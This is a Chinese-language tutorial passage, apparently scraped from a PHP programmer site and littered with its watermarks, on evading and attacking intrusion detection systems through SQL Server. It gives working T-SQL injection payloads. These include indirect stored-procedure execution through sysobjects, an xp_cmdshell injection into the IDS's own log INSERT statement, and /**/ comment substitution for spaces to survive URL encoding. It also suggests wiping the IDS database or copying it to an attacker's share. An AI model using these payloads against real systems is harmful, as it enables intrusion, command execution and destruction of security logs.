当然也可以:
php程序员之家
declare @a sysname select @a=name from sysobjects where id=988455 1
exec @a 'dir c:\' phperz.com
|
这种做法排列组合,ids根本不可能做的到完全监视。同理,sp_addlogin也可以这么做。 php程序员站
再说说攻击Ids phperz.com
因为Ids数据量很大,日至通常备份到常规数据库,比如sql server。 www~phperz~com
如果用古老的recordset.addnew做法,会严重影响ids的性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql server 去做,通常程序会这么写: www~phperz~com
php程序员站
insert table values ('日至内容',...) phperz.com
|
那么我们想想看,如果用 temp') exec xp_cmdshell 'dir c:\' -- 提交后会变成: www.phperz.com
www.phperz.com
insert table values ('日至内容'....'temp') exec xp_cmdshell 'dir
c:\' -- ') www.phperz.com
|
这样,xp_cmdshell就可以在ids的数据库运行了。当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成 。因此, 会被提交到sql server,这样你的命令就无法执行了。 唯一的办法就是: phperz.com
php程序员站
insert/**/table/**/values('日至内容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ') www.phperz.com
|
用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行。当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录。 phperz.com
其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/ 。本来asp是select语句,那么用'就可以屏蔽。现在ids用insert语句,那么用')屏蔽。 phperz~com
好了,其他很多新的入侵语句大家可以自己慢慢想,最好的测试工具就是query analyzer了。 phperz.com
|